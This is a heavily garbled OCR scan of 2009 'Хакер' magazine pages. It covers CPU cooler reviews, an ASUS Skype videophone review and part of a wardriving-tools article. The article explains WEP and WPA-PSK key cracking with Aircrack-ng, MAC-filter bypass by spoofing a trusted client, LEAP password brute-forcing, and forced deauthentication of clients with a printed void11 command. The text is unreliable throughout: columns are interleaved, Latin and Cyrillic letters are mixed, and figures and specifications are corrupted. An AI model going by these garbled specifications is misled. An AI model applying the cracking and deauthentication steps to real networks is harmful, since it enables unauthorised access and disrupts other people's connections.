720. Enermax EIN720AWT

Lavalys

исходя из ПХ кулера.

ХАКЕР

06 j1 26/ 09

»

IceHlammer IH-4405

Thermal.right IFX-14

Технические характеристики:

Технические характеристики:

ferrum

Поддерживаемые процессоры: АМD 50cketAM2/AM2.... lntel LGA775

Поддержива емы е п роцессоры' АМ О 50cket АМ2/АМ2"', Intel LGA775/

Материал подошвы: медь

LGA1з66 (с пом о щью доп. а кс ессуа ра I

КоличествотеПЛО8ЫХтрубок: 5

Материал подошвы. медь

4

Диаметр тепловыпрубок, MM~ 6

Количествотепловых трубок:

Диаметр вентилятора, мм: 120

Диаметртепловыхтрубок, мм:

Скоростьвращения вентилятора,об/4ИН: 1000-2000

ДиаfАетр вентилятора, мм. ЗХ 120 (в комплект не входят]

8

Уровень шума: 19-32 дБ

Скорость вращения вентилятора, об/мин- п/а

Поток воздуха, CFM: 55.6-ВО.1

Уровень шума: n/a

Поддержка PWM. нет

Поток воздуха, CFM· /па

Габариты. мм . 125Х105Х150

Поддержка PWM п/а

Вес, Г: 79В

Габариты, мм 146Х126Х161

Вес, г· 790

••••••••• 0

••••••••••

Начнем с плюсов. Во-первых, технология НОТ [Неаtрtре-Оlгесt- Touchl, суть которой состоит в том. чТо тепловые трубки подходят как раз к плоскости контакта процессора и радиатора Это улучшаеттеплообмен



Кулер оказался лучшим среди рассмотренных в тесте Всего 36 градусов

при обдуве одним [11 радиаТОР04 диаметром

120 мм - это очень сильный

в саМИА куле ре Основание радиатора выполнено из меди, а вентилятор

результат Вместе с радиаТОРОfА никаких вентиляторов В комплекте нет

устройства имеет девятьлопастей. Скорость их вращения изменяется

(хотя есть посадочные места аж для четырех), но зато присутствует IFX-1 О

8 пределах от 850 до

1650 об/мин Iчто, вообще говоря, противоречит

- дополнительный радиатор для охлаждения обратной стороны сис­

официальным данным). Крометого, на радиатор можноустаНО8итьеще

темной платы Мы установили на радиатор

один, дополнительный вентилиор В комплекте скулером идеттюбик с

Antec

IFX-14 одну 120 мм вертушку Tr'iCoollEO и, тем не менее, получили наилучшие результаты. IFX-1 О также есть кулер, хотя во время 'геста мы его ВЫКJIючали, чтобы

термопастой Такая щедрость для подобной цены' .. По ТТХхарактерис­

На

тики термопасты таковы: теплопроводность более 75 Вт/(м*К], тепловое

оценить именно процессорный охладитель.

СОПРОтивлениеменее 0.06 К/Вт - Очень неплохо. ведь термопаста на

25% состоит из серебра. Представляется сомнительными полезность и удобность

IFX-l О,

пос­

кольку использовать его можно далеко не всегда. Намного логичнее Из fАИНУС08замечен сильный шум на больших оборотах.

ХАКЕР

06/116/09

выглядел бы хороший вентилятор на кулере.

~

019

T'hermaLright Ultra-120 eXtreme

Xite:nce Black Hawk Edition Техническиехарактермстмки:

Техническиехарактеристмки:

Поддерживаемые процессоры: AMD SocketAM2/AM2+/939/940/754.

Поддерживаемые процессары: АМDSОСkеtАМ2/АМ2+.lпtеl LGA775/

InlelLGA77

LGА1,з66 !с помощьюдоп. аксессуара)

Материал подошвы: медь

Материал подошвы: медь

Количествотепловых трубок' 6

Количество тепловых трубок: 6

Диаметр тепловых трубок, мм: 6

Диаметртепловыхтрубок,мм:6

Диаметр вентилятора, мм.

Диаметр вентилятора, мм: 120 (в комплект не входят]

Скорость вращения вентилятора. об/мин' 1800

120

Скорость вращения вентилятора, об/мин:·

Уровень шума. 2здБ

Уровень шума: п/а

П атак воздуха, С FM 78.31

Поток воздуха, CFM. п/а

Поддержка PWM да

Поддержка PWM· п/а

Габариты, мм: 155х143х144

Габариты, мм: 63Х132Х161

Вес, Г: 876

Вес, Г: 790

••••••••• 0

••••••••••

Эта модель от Тhегmаlгight конструктивно схожа с IFX-14: такой же

ТеПЛООТ80Дэтой м одел и улучшен посредством шести 8-миллимеТРО8ЫХ

массивный теплообменник, те же теплаотводные трубки Последние

тепловыхтрубок. Еще одним плюсом является гидродинамический

соединены с корпусом пайкой, что улучшает общуютепловую проводи­

подшипник,установленныйв

мость. В «плюсы» также отнесем и большую площадь ребер радиатора

креплен на радиаторе при помощи резиновых креплений. Это позволяет

'120

мм вентиляторе, который. кстати, за­

В тесте устройство показала результаты, схожие с покгэателями IFX- 14 с

погасить ненужные механические колебания. Есть возможность регули­

одним вентилятором.

ровки стрости вращения кулера с Г10МОЩЬЮ

В комплекте имеются крепления на Iпlеl LGA775 и АМD SocketAM2+,

Результат устройства в тесте нас приятно удивил

однако этим производителирешили неограничиваться Дополнительна

нялась выше 40 градусов Г10 Цельсию!

PWM.

-

температура не под­

можно приобрести переходники под LGA1366, АМD Socket 939 и Iпtеl

Еще одним немаловажным преимуществом стала цена, а также то, что

Хеоn. На официальном сайте они доступны по цене $1 О [у нас, соответс­

модел ь может работать Г1рактически с любым современным процессо­

твенно, будут стоитьдороже).

ром. Теплопроводности хватит даже на самые горячие камни

н а кулере нет собствен наго вентилятора. Вдобаво к могут воз н икнуть

Нет креплений под LGA 1366lвпрочем, это не очень серьезный недоста­

проблемы при установке из-за, прямо скажем, не самых маленьких

ток, ведь мы рассматриваем

габаритов

Г1роцессоров от АМD).

-

модели. в основном Г1редназначенные для

Уровень шума на максимальной частоте ['1800 об/мин) высоковат - 23 дБ при создаваемом потоке в 78.31 CFM

~

020

ХАКЕР

06 /1261 09

~~~.'''~)'':':~:~)' .

Zerotherm ZEN FZ11 20

"

»

'./"

'"

,

,

". ,

fet-num'

Noctua

NH-C12P

Технические характеристики:

Технические характеристи ки,:

Поддерживаемые процессары: AMD Soc'ketAM2/A'M2+, l,лtеl'LGА775/

Ilоддерживаемые процессары: IлtеlLGА775.АМD SocketAM2/

LGА1з66 (с помощьюдол. аксессуара!

АМ2+/939/940

Материал подошвы: медь

Материал подошвы, медь

Кол и чество те пловых трубок. 6

Кол и чество тепловыхтрубок: 4

Диаметр тепловыхтрубок, ММ:

Диаметр тепловых трубок. мм' 6

Диаметр вентилятора, ММ: 120

Диаметр вентилятора, мм:

6

Скорость вращения вентилятора, об/мин: 1300

120

Скорость вращения вентилятора. об/мин: 1100-1800

Уровень шума: 12.6дБ

Уровень шума . 19.5-31.4дБ

Поток воздуха, CFM: 92.3

Поток воздуха. CFM. 59.48

ПОРАержка PWM: нет

Поддержка PWM:Aa

Габариты, мм: 114Х126Х152

Габариты, мм: 126х61Х156

Вес, г: 730

Вес, r 670

• • • • • • • • 00 • • • • • • • • 00

Эта система охлажденияпостроена по ставшейуже классическойсхеме:

Каркасом всей конструкциислужат шесть тепловыхтрубок, при ЭТ0>4 сто­

на медном радиаторе вертикальнорасположенвентилятор. Соединение

ит заметить, что ребра радиатора крепятся прямо к площадкесоприкос­

выполнено при помощи четыреХ'геl1ловыхтрубок,при этом использова­

новения с процессором Она, кстати, не совсем обычная. с дуговым риф­

лась пайка У ребер радиатора довольно необычнаяформа. На офици­

лением. Из разумных объясненийна ум приходитувеличениеплощади

альном сайте производителязаявляется, ЧТО'гакая форма увеличивает

соприкосновениятермапасты и радиатора, но В таком случае надо оной

площадь поверхности.а. следовательно,ВОЗ~40жен более интенсивный

всю нижнюю поверхностьрадиатора просто залить. На краяхлопастей

теплоотводв атмосферу. Вентиляторуправляемпри помощи PWM, при­

вентилятора им е ются зазубрины. Он и разделяютобраЗУЮЩ\о1есявихре­

чем довольно легко Да и крепится без особых проблем - на АМ2+ встал

вые потоки на более мелкие IуменьшаетуровеньШУ~4а). Кроме того, по

буК8альноза минуту Конечно. с Iпtеl'ом все будетпозаК08ыристее­

заверениям разработчиков,спектр шума расширяется,что делает его

из-за подпружиненных креплений. устана8ливаемых с обратной стороны

менее надоедливым[говоря умными словами. при этом он приближен к

платы. По части зффективности -

математическоймодели адд\о1ТИВНОГОбелого гауссова шума ... I. Шумит и

результаты I~ормальные, однако ничего

выдающегося. Еще раз подтвердилось правило «цена - не показатель

виБР\о1рует кулер реально очень слабо

качества».

При такой цене охлаждение могло быть гораэдоболее эффективным. Уровень шума Д080ЛЬНО существенный.

ВЫВОДЫ

осноВной фун кцией

Все модели по-своему хороши. Но у каждой

сора - справилсяТhегmаlгight IFX-14. за что

просто не поверил. Впрочем. остальные моде­

из них свои недостатки,

заслуженно получает приз «Выбор редак­

ли также неппохи. Х

и каЖДдЯ подходит

под разные задачи. ОДНё!КО лучше всего с

ХАКЕР

06 11261 Q9

- охлажден ием процес­

Ice Наттег IH-4405 - в его цену я сначала

ции». Лучшую покупку однозначно забирает

,~

021

АЛЕКСЕЙ ШУВАЕВ

A~US ,

AIGu"rUSV1 ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: Дисплей: LCD 7", 800х480

KaMepa:VGA,640x480 Интерфейсы: Ethernet, 802.11 b/g Габариты: 202 х 12Зх25З мм Вес 1,6кг

~

022

ХАКЕР

06 /126/ 09

Пользоваться

Skype становиться, так же

привычно, как обладать со­

товым телефоном. Интернет-теле'Фония обладает массой достоинств:

" она бесплатна, хорошее качество звука и изображения, возможность обмена текстовой информацией или файлами, доступность телекон­

ференций. Неудивительно, что компания

ASUS

решила предложить

нам еще один девайс для связи с абонентами без использования ком­ пьютера.

ЧТО ОН МОЖЕТ?

гаджет, мы приступили к настрой­

пользоваться. Организовать

можно по видеосвяэи

Гаджет под именем ASUS AiGuru

ке, Разговорс устройствомна

телеконференцию тоже ~~ожно,

но? Кроме того, такой девайс

английскомязыке не вызывает

но без мышки - тяжеловато. Еще

крайне пригодится, если утебя

восторга, но в данной прошивке

одно огорчение нас ожидало при

имеется брат или сестра, крайне

русскогоязыка ,;е имелось. Введя

загрузке списка контактов: все

словоохотливые и имеющие

попу.лярность, а доступность ши­

логин и пароль [если утебя их нет,

русские ники не отображались, как

массудрузей в Сети. Чтобы он или

рокополосного интернета сделала

тоты сможешыутжезарегис­

и присылаемые сообщения. На

она не занимали компьютер, ты

SVl

создан для разговоров при

помощи интернет-телефонии от

Skype.

Программа уже обрела

аффект­

трироватьсяl,~Ш принялись

iial;HOM зтапе девайс совершенно

просто подключаешь видеофон по

ниться кдругучерез интернет, чем

названиватьзнакомым. Громкость

не дружит С русскими шрифтами

беспроводной связи и отправля­

ждать, пока он оторвется от компа

динамика и чувствительность

'у нас был демонстрационный

ешь родственничка в соседнюю

и найдетсвою трубу дo~~a. Неко­

микрофона порадовали,но мы

образец, будем надеяться, что

комнату: для тебя -

торые пользовател и обзаводятся

так И не встретили регулировки

видеофон появится 8 продаже с

спокойно посидеть перед компом,

web-камерами и тогда уже можно

микрофона.А вот качество картин­

нормальной руссификациейl Раз

а для нее или него

устраивать видео конференции.

ки встроенной камеры откро­

уж м ы затронули тему управления

вастаться новой игрушкой перед

С80е дело

-

теперь проще ДОЗ80­

возможн ость

-

П080Д пох­

Но все зто стаНО8иТСЯ недоступ­

венно разочаровало'при любом

кнопками, то нельзя неупо~~януть

друзьями. Ктомуже, ты можешь

ным, как только ты выключишь

освещении и л юбых настройках

об зргономике в целом Здесь

всегда оставаться на связи, даже с

свой компьютер

изображениеможно назвать не

можно только порадоваться

выключенным компьютером

Этот девайс

более, чем удовлетворительным,

Устройство очень устойчивое, а

жешь организовать консультации

большой компьютер, заточенный

ТЫ можешь поигратьс ползунками

панель СДИСГlЛеем наклоняется

по Сети, а параллелыiO работать

под одну еДИНСТЕен ную задачу:

яркости, контрастностии еще

ОТI~осительно ОСI~ования. В самом

на компьютере, не занимая окном

обеспечить удобство переговоров.

задеЙСТВО8атьпяток других, но

основании спрятан аккумулятор,

скайпа драгоценную площадь

Встроенный динамик и микрофон

это не особо помогает, Фокуси­

который обеспечивает не очень

дисплея.

позволят обойтись без гарниту­

ровка не изменяется и придется

длительную автономную работу.

ры, но при необходимости ты их

довольствоватьсяустановками по

Кнопок немного и все они доволь­

ИТОГ

сможешь подключить. КоличеСТ80

умолчанию. Попытка подключить­

но крупные, так что даже в темноте

в качестве итога можем собрать

кнопок сведено к мини~~у~~у, так

ся к роутеру по W,-Fi не увенчалась

п ромахнуться будет сложно.

все впе4атления и рассказать

что ты сможешь работать без

успехом. Немного поразмыслив,

затруд·нениЙ. Дина ми к довол ьн О

мы отключили шифрование и тог­

громкий, а регулироватьуровень

да девайс смог подцепиться. Но

НАХОДИМ ПРИМЕНЕНИIE

итутне все гладко прошло. даже

Стильный и зргономичныйдевайс

-

сам по себе не­

звука ты сможешьдаже

80

время

-

мо­

о чувствах, которые вызывает

этот деваЙс. 8идеофон несет нам простоту коммуникаций не только голосом, но и при помощи

разговора. Кроме того, девайс

при вкл Ю4енном О НСР гаджет не

можно использовать [хотя и не на

изображения. Работать стало

оснащен собственным аккумуля­

смог автоматически прописать

полную катушку, как зто делается

действительно легко и с этим

тором, и ты сможешь быть незави­

все адреса и пришлось зто делать

на компьютереl. Но где же он мо­

спра8ИТСЯ даже твоя прабабушка,

симым от розетки около получа са

вручную Вероятно,проблему

жет найти свое применение? Если

если ты все настроишь. Но есть

разговора.

удастся решить с выходом новых

ты приверженец ноутбуков, то

некоторые недоработки, вроде

По функциям самой программы

прошивок. После подключения

врядли потерпишь на своем столе

отсутствия поддержки шифро­

Skype ничего не изменилось: ты

все заработало довольно стабиль­

нагромождение пластика и злек­

вания при подключении по Wi-Fi

также, как И прежде, можешь

но и шустро. Но тут мЫ столкнулись

тронной начинки. Если же утебя

или невозможностиработы с

добавлять новых пользователей,

с еще одной проблемой -

стандартный десктоп, тотакже

кириллицей.Кроме того, видео­

открывать чаты и организовывать

текста Глядя на довольно крупный

может не найтись места на столе.

фон, основной функцией которого

телеконференции.

дисплей, было бы логично пред­

Но когда в твоей организации

является как раэ передача изоб­

положить, что он будет сенсорным,

решат, что нужна свяэьдешевая,

ражения, должен демонстриро­

НАЧИНАЕМ ТЕСТИРОВАНИЕ

но зто не так. Все цифры, символы

качественная иудобная, то вполне

вать картинку если не идеальную,

и БУК8Ы приходится наб и рать

можно вспом нить О видеофоне.

то очень высокого качеСТ8а, чего

Включив девайс мы сразу же

при помощи пятипозиционной

Замечено, что директора и ТОП­

мы, к сожалению,не наблюдали,

решили подключиться к Сети.

кноп ки Так что, если тебе надо

менеджмент любят различные ус­

В остальном же, гаджетдовольно

Первымделом мы подключили

добавить нового пользователя

тройства, которые подчеркивают

интересныйи будет пользоваться популярностью,особенно если

ASUSAiGuru SVl

26/09

-

по Еthегпеt-ин­

набор

или сформировать список або­

значимость. Например, позвонить

терфейсу. Обвязавшись кабелем

нентов, то проще зто 6удетсд~лать

секретарше и попросить кофе

цена опустится хотя бы до трех

и установив на удобном месте

с компьютера, а потом просто

можно по обычномутелефону, а

тысяч рублей. I

ХАКЕР

06 /'1261 09

~

023

{

~'

"

»

pc:_zone "

Netstumbleг

~

'

www.stumbler.net Определенно один из самых известных и лучших инструментов для вардрайвинга. У стемблера всего одна задача -

itJ··""

обнаРУЖI1ТЬ в эфире точки



-

~-.IL\J Chaмelt

.

МАе

@ 00045дЕВ4З61 О 00022DOECFI5

SSID.

ffi·~? Fiael~

доступа. считать SSID и за писать полученную

@ОО601DIЕЗ~ОО О00ЗlJ05150Э0F

информацию Е логфайл вместе с координатами,

@OOO22DOADA68

если к програМ'Ае подключен приемник

®

00045АЕfЗ855 @ООЗ065026DЗВ @ООО22DОЗ7С57 @О090480В358Е @ 00О22DОD848З О 00045AD1Ef4D О 0002202DOCFO @ 004005DЕDAЗF

GPS.

После удачного вардраЙЕИНга информацию О

найденных АР-шках месте с данными о местора­ сположении можно ЭКСПОрТИрОЕать Е lоg-файл, преобразовать его с помощью многочисленных конверторов в понятный

Google'y формат KML

000=278311

и

SSID

H:h"" I VendOl

I

JGKAirPot-' net",...ork

,

АР

1

P,o>Cim (Agm>/W.,.IJ>.N)

АР

i!9g, JMI«Ai, ( John TaybI

10 1

АР!'!&

АР АР

johп.linщ..

Э

Jon'$ Home JPAppje NetWOEk \IIreJers

1 9

l'Io,im (Age,.j ORiHOCO Unk'Y' Apple P,,,,,,m {Ag-J OR;NDCO

jflmoLм

6

~ern(e!<

АР

WEP WEP WEP WEF WEF

Кo'i>f'U,ell

3

АР

"'ЕР

k.e:ndlick

6 7 6

Pt"';m (Age,e) OA;NOCO LinksY$ l'Iот, (Дge,e) OANOCO O"LioIk P,o>.N) Pim ~g".) OR;NOCO Р"Юm IAge,e) ORiHOCO AP!'1o I'IО"n (ДgereJ ORD'lOCO Р,,,, .. (до...) ORNOCO

Кeyfl..!'ne SLeuon

knoone\ К1а!tWОIk.~ Netwttk

,

@ОО6010FО2ЗОС

k,fщ'sintemet

@ 00022DOC1AI4

LaGulIldJj

карте с помощью GoogLe Maps или декстопной

® 00022DЗ8821Ю ® 0030651 ЕОССЗ О 00О2200DОЭ5С

~щеп

1

LвAO\I

1

It'I>ny6

00002201<:8817 О 0ОО45АЕDFСЭl

Lime: S'roke,agE:

6 10 6 6 6 6

Для поиска ЖИЕЫХ точек доступа Netstumbler использует приемы активного сканирова­

О 00045АDАЗЕ6F О 00О45А2Е1АО7 О 00045'\OD465F

ния, Т.е. не просто прОСЛУLIJИЕаетэфир, но

;,

и каждую секунду отправляет специальные

фреймы. Надо сказать, что специфические

Еnс. .. ~

Lilrk$Ys-

за пару секунд отобразить все точки доступа на

программы Google Earth

Т,'''''

6

ieJr1'~rn

1 1

6n1ц]l$

Г~ link,~ ~nk,,..

АР

АР

АР АР

"'ЕР

WEP

АР

J

АР АР

I

WEP

АР АР

VJ<:P VJEP

АР

"'ЕР

АР

WEP

АР

АР АР

Unk"",

АР

Unksуэ'

АР

linkf}l$

АР

1

LnksJ's

АР

.rJJ

I

I

КЛАССИЧЕСКИЙNETSTOMBLER

LС/SNАР-фреймы,сгенерированныестем­ блером, легко распознаЮ1'СЯ современными

записать их координаты, но только под вин­

IDS-системам и. К тому же, а кти вное скан и ро­

дой И без I'iадежды получить какую-либо еще

команды приводится В опрятный вид и

вание не поможет тебе Е поиске спрятанных

ценную информацию.

объединяется с информацией о расположе­

Vistumbleг

Netstumbler может распознать лишь факт

www.vistumbler.net

текущими координатами GPS. Под никсами,

использования шифрования сети, не уточ­

Ну ХОРОшо, а как быть если на ноуте/нетбу­

которые парсят ВЫЕОД команды

НЯЯ какой именно механиэм используется.

ке стоит Vista или WIП7? По правде говоря,

Забавно, что

Вдобавок, программа наотрез отказывается

возможность аКТИЕНОГО сканирования точек

щью 1Улзы для аюоматизации различных

[hlddеп\ точек доступа, (впрочем сама под­ борка информации не фонтан). Например,

ганил GUI-интерфейс, в котором вывод

нии обнаруженных АР-шек, считывая ее с

кстати, существуют аналогичные

Vistumbler

утилиты,

Iwlist.

написан с помо­

работать под V,stа'ой и вряд ли когда-нибудь

доступа есть в самой с,",стеме Это делается с

действий Autolt iПОДРОбнее о ней можеLIJЬ

это делать захочет В результате, получаем

помощью консольной утилиты пеtsh:

прочитать в статье «Пусть ОН все сделает

отличную программу, если нужно проска­

netsh wlan show

нировать эфир на наличие точек ДОС1Упа и

Однако умелец Апdгеw Calcutt быстро свар­

~

024

леtwогks mode;bssid.

сам!» в

#]()7 ::x:1,

приложения

позволяющей разработать

даже тем ЛЮДАМ,

которые О про­

ХАКЕР

06 /126/09

,

.

0Y",;;",t4';;;:-';;';".ml~-------_i..~::'r:o:;;;';;:=,''''---'''

-

__ -.. -­ -

- __

1k!'?1I;­

_~'J'II

"'.. . ~~­

_ .. н_

ее для поиска

Wi-Fi

используемой

ИМИ защиты.

спотов и определения

,W

11

=:=::= . __

~ИI)

1'«Iш·

11

__

Oo:Jnд7t-l:::q

I#1/-Юt~

u

Мo;j ..... iII'llп.h~

11

~

~w

~ w"

,

:=: ==

~ I

~_::f,«.0(J __

1J"'_ _

:~

~

__

........... 1

.....cn;

....... mJ.IIOR:1»1

__

I

Кismet

...."

www.kismetwireless.net

~"

~JI.t~J.!IЛjaoН/.l.L

~l:бf;tмo'

~=~аш

::-У.М.

~Я"'J1

~~a.u.'I

А это уже полноценное никсовое при­

~W"..,,""­

~""'''..

....

~"'Ii'fi0'1

~_

,

ложение для поиска беспроводных сетей,

",.

-...\11I­ ...

~

~r,d.

снифинга, и даже обнаружения вторже­

"'""""'"'1<\.,1; .....

)

"_O»J1OV~

J

~ ... _~........-M"

!

_.«-J.IAЦ~tI

....

. . - _....

ний.

Klsmet

Netstumbler

кардинально отличается от и подобных ему тулз тем, что

для определения беспроводных сетей при­

меняет пассивное сканирование [ничего граммировании толком никогда и не слыwа­

не вещая в зфирl. Причем используемые

Сам набор состоит из нескольких утилит

методики позволяют оп ределить некоторую

и включает alrodump Icнифер для сетей

работает отменно, отображая помимо уровня

информацию о клиентах. подключенных

802.11!, alreplay Iтулза для инжекции Wi-Fi

сигнала МАС-адрес вендора, используемую

к сети, а также найти скрытые (поп­

фреймов), аiгсгасk [взлом WEP и брутфорс

систему шифрования и прочие пара метры

ЬеаСОПlпgl сети, правда. только В том слу­

WPA- PSKJ. а также alrdecap [декодирова­

""~I!-!!!'""" ли. При этом Vistumbler не просто работает. а

Данные о расположении Ha~дeHHЫX точек

чае если в них есть некоторая активность.

можно «на лету» экспортировать в

Kismet

формат и EJ реальном

KML

BpeMeHtoI отсnежtolвать

их появления на карте через

Google Eaгth.

автоматическим может определить

используемыедtolапазоны IP-аАресов. пере­

определенное количество перехвачен­

хватывая ТСР.

ных пакетов: как только будет захвачено

UDP. ARP и DНСР пакеты,

Для Bapдpa~BepOB полезно~ также окажется

дампить трафик в формат для Wlreshark/

функция, с пщющью KOTOPO~ уровень сигнала

TCPDump

и даже определять примерное

обозначается с помощью различных звуковых

расстояние до точки доступа (работа с GPS,

фа~ЛО8. Справедливости ради стоит сказать,

рдзумеется, поддержи ваеТС51

что в

Примечательно, что после более чем

Netstumbler'e та:<же можно было про­

ние перехваченных WEP/WPA файлов). В

общем случае для взлома WEP необходимоr!!I:=;

J.

нужное количество фреймов,

aircrack- пg

будет готова провести статическую атаку

на WЕР-ключ Сейчас Аlгсгасk-пg поддер­ живает три способа для «восстаН08ления»

5 лет

ключа

вернуть подобны~ трюк, но лtolwь при помощи

разработки, создатели вот-вот порадуют нас

• первый метод через PTW-аl'аку: основное

внешних скриптов

совершенно HOBЫ~~ релизом. В частности,

nреимущество заключается внебольшом

inSSlDer

www.metageek.net/ products/inssider PaccтpoeHHЫ~ тем фактом, что

в конце мая вышла KIsmet-2009-05-RС1, в

количестве перехваченных пакетов, необ­

которой был кардинально переработан интер­

ходимых для взлома WЕР-ключа

фейс [по-прежнему используется псuгsеl,

работает только с агр-пакетами, и это. есте­

Но метод

ствен но. большой недостаток,

• второй вариант - через FMS / КогеК атаки.

Netstumbler

не развивался несколько лет и не работает с

Метод включает в себя различные статиче­

Вистой и даже 64-битной хр,

ские воздействия [FMS, КогеК, Вгutе [огсе)

Рulпеу

Charles

решил написать свою собственную утилиту

ДЛЯ поиска WЕР-ключа и требует больше

для поиска

пакетов. чем в случае РТW-дтаки;

Wi-Fi ceTe~. после чего опу­

WЕР-КЛЮЧ НАЙДЕН: CAJRCRACK­ NGЭТО БЫЛО НЕСЛОЖНО

переделаны конфигурационные файлы,

--. ОЧЕНЬ ПРОСТОЙ, НОУДОБНЫЙ СТЕМБЛЕРПОД VISTA!WIN7

добавлены новые опции для фильтрации данных и новая система предупреждени~. оптимизирована загрузка процессора, прора­

ПЕРЕРАБОТАННЫЙ ИНТЕРФЕЙС НОВОГО КlSMET'A, КОТОРЫЙ ВЫ­ ЙДЕТ СПУСТЯ 5 ЛЕТ РАЗРАБОТКИ

бликовал исходники на известном портале

бота на система плагинов Что касается порта

The Code ProJect. Идею подхватил Norman

для ви нды, ТО он есть, но реал изо ва н компа­

• трети~ вариант - подбор с использовани­

Rаsmussеп, после чего на свет появилась

нией САСЕ и, увы, работает только со специ­

ем словаря (word [1st), используется, в основ­

новая версия IпSSlDег'а. построенная на

альны~~и

ном, для взлома WPA!WPA2 ключе~.

базе

Natlve WI-FI API Инса~дер подобно

Netstumbler использует активные методы

WI-FI адаптерами Сасе AirPcap.

сканирования, а всю на~денную о точках

aircrack-ng.org

доступа информацию отображает в табличке,

Alrcrack-ng -

сдабривая данные красивыми графиками

ный компле кс для взлома

уровня сигнала. Тута очень простая

-

ниче­

го лишнего, но я нередко использую именно

ХАКЕР

06/1261 09

Полноценная версия Аlгсгасk-пg суще­

Aircгack-ng

ствует только для

Linux,

хотя на офици­

альном сайте доступна "недоверсия» для

полноценный программ­

802.11 WEP

винды. Разработчики честно предупре­ ждают, что для ее работы нужно самому

IWlred Equivalent PrivacyJ ЕпсгурtlOП и

доработать

WPA/WPA2-PSK ключей для WIFi-сетеЙ.

WI-Fi адаптера.

DLL

конкретно для своего

~

025

...

----'~,

'Р_=

,.,.....

~~.-~i"o--·l __0_ _1

H
Cat6;1uIoI.ionlD . .{FZ..зо6ЖВ·"21·ФОС·~.ВFВ3(FlD3ЭЕО} МдC.Addl~n,

... ос).(:м;.sз.24~в.зз(Chщ;led) cr..coS)tJI~lnc. [oo-cG-53)

I

Speed .....1 Gbps

DHEP ' . .~~....d TCPJlP . .En~d

Qit.1Ыe

SP!'~d

.172e~e-".J'$

Sp~d

... 08)'1«1.1

~=r=~1

l"easeObl.ained . .5I2312OO912:5a.2GAМ le.5ieE~es .

I ~МAC I

jJ

.. &I6I2OOЭ 125а26АМ

Di:М1eOHee!

Re!t,)08IP

I

БЕСПЛАТНАЯ УТИЛИТА ДЛЯ (МЕНЫ

ОТКЛЮЧИТЬКОГО-ТО ОТ БЕСПРОВОДНОЙ ~

-

МАС-АДРЕСА ПОД ВИНДОЙ

СЕТИ? ЛЕГКО, ЕСЛИ ЕСТ'Ь ЕГО МАС-АДРЕС

info

Тулзы ДЛI1 работы с

W,-F, есть для са ~ыx

разных устройств.

Technitium

Если не брать в рас­

www.technitium.com

чет ко~~уникаторы

Что удивительно, но фильтрация по МАС-адресам

и смартфоны,то

по-прежнемуостается достаточно часто используемой

y~eCTHO упо~януть,

защитой Впрочем, огранить доступ от случайных зевак

напри~ер, Р5Р.

она дейстаитеЛЬНGс~ожет, а от вардрайверов_ ну, пускай

Созданныйдля него

ребята балуются

Wifi5пiffегможно

могут только клиеюы, которые занесены

скачать с сайта b.l1.Q;LL

ных ~ашин, Обойти же подобную защиту проще простого

:1. ПодключитьсР.

к таким АР в этом случае в список доверен­

ПРОНИКНОВЕНИЕВ CISCO

Www,Р.2.р.:д.а.сks,сО 1 Тl/

- нужно лишь сменить МАС-адрес своего беспроводного

Vепdог [nроизводитель оборудования] покажет слово

fil(oL1~.7.

адаптера на доверенный. Подходящий МАС легко опреде­

CI5CO, нелишним будет вспомнить о протоколе авто­

лить все той же утилитой Airodump, перехватив пару naKe­

ризации LEAP [Lightwelght ЕхtеПSIЫе Аuthепtiсаtiоп

dvd

~

тоlЗ. Изменить МАС-адрес под никсами поможет утилита

Protocol), разработанном как раз-таки циско Проверить

mассhапgег, Что касается винды, то и тут существует нема­

догадки об исnользуемо,~ В сети протоколе ,~ожет

ло программ, в том числе платная 5МАС [VJWlN.klссопsultiпg,

помочь снифер, который должен nоказать пакеты

пеt/sпо~сJ и бесплатная ТесhПltlum Обе требуют лишь

REQUE5T, EAP-CISCO Wlreless [LEAP) Главная особен­

выбрать ceTe80~1 адаптер и указать для него желае,4ЫЙ

ность

МАС-адрес, Убедись, что адрес успешно сменился (команда

только пароль, но и имя пользователя' По умолчанию в

iрсопflg /all в консоле) и попробуй установить соединение,

Windows этот протокол не поддерживается, поэтому для

LEAP состоит в том, что для авторизации нужен не

Упомянутые в статье

К сожалению, с первого раза ты можешь легко обломаться,

работы потребуется установить специальный клие~т

утилиты и x-tооlZ'bI

поскольку овторизированныйклиент может быть уже под­

Аiгопе( Сllепt Utillties \llttр:l/гогsсhасh.СОПСОI'diа,r;а/пеgi

необязательнокачать

ключен

«

из инета

грамма

Voidl и деаутеН'Гифационныепакеты.

они будут

сети, Выселить его олуда поможет все та же про­

на DVD-диске

­

гепооtе ассеSS/'о'.'iгеlеss/gепегаl info/acu.html]. А есть ли смысл его устанавливать? Конечноl Несмотря на npo­ думаннооь протокола, даже в нем обнаружили уязвимо­

voidl11 http://wi relessd efen се.О rg/Contents/ Void11Main.htm

сти, позволяющие легко подобрать пароль с помощью перехваченных пакетов LЕАР-авторизации. Первым это

пронюхал Joshua Wrrght -

разработчик утилиты ASLEAP

Voidl1 используется для деаутентификации беспроводных

[httр:Uаslеао.sоuгсеfог е r.\~\I, Эта утилита перехваты­

клиентов от точки доступа, или. проще говоря, для при­

вает сетевые пакеты при повторном коннекте клиента,

нудитель~IOГО отключения клиентов отточки ДОСlупа После

после чего брутит пароли для идентификации.Утилита

такого отключения беспроводной клиент будет автомати­

работает нативно под LIПUХ'о,~, однако на официально,~

чески пыттьсI1 подключиться к точке доступа (повторить

сайте есть версия программы И под винду !правда, не

ассоциацию). А при каждом повторном подключении будет

самого последнего билда]

создаваться трафик, который нужен для подбора ключа, К тому же. можно отключить клиента, занять его МАС-адрес

WIFIZOO

Дистри5утщ!ыдля

и таким образом обойти фильтрацию по MAC-aдpeca~~, К

Раз воспользовавшисьутилитой Wif,ZOO, понимаешь,

wагdгiVlпg'а

сожален и 10, средства Windows это не позволяют. зато фокус

насколько просто перехватывается различная инфор­

Slitaz Аlrсгасk-пg

легко реализуе~~ под никсами С помощью этой утилиты:

~

links

DistпЬutiоn:

мация в открытых

-

WI-F, сетях, Сама задача утилиты

пассивно собирать различную информацию из сети,

htt Р :LL2.I.r::~ г.;э с1.:.

voidllJ)enetration ··5 КЛИЕНТСКИЙ_~f.'\С -8

Написанная на Руthоп'е (8 основе, кстати rOBOpl1, лежит

119~

МАС_ТDЧКИ-ЦОСТУПА -о wlanO.

программа 5сару, о которой ~ожно прочитать статью в

ЭТОМ номере), тулза позволяет извлечь из эфира массу

ph p?id~slitaz ~Еш.Q..tg-еХRlоit,

AsLeap www.willhackforsushi.com/Asleap.html

ОЛJ

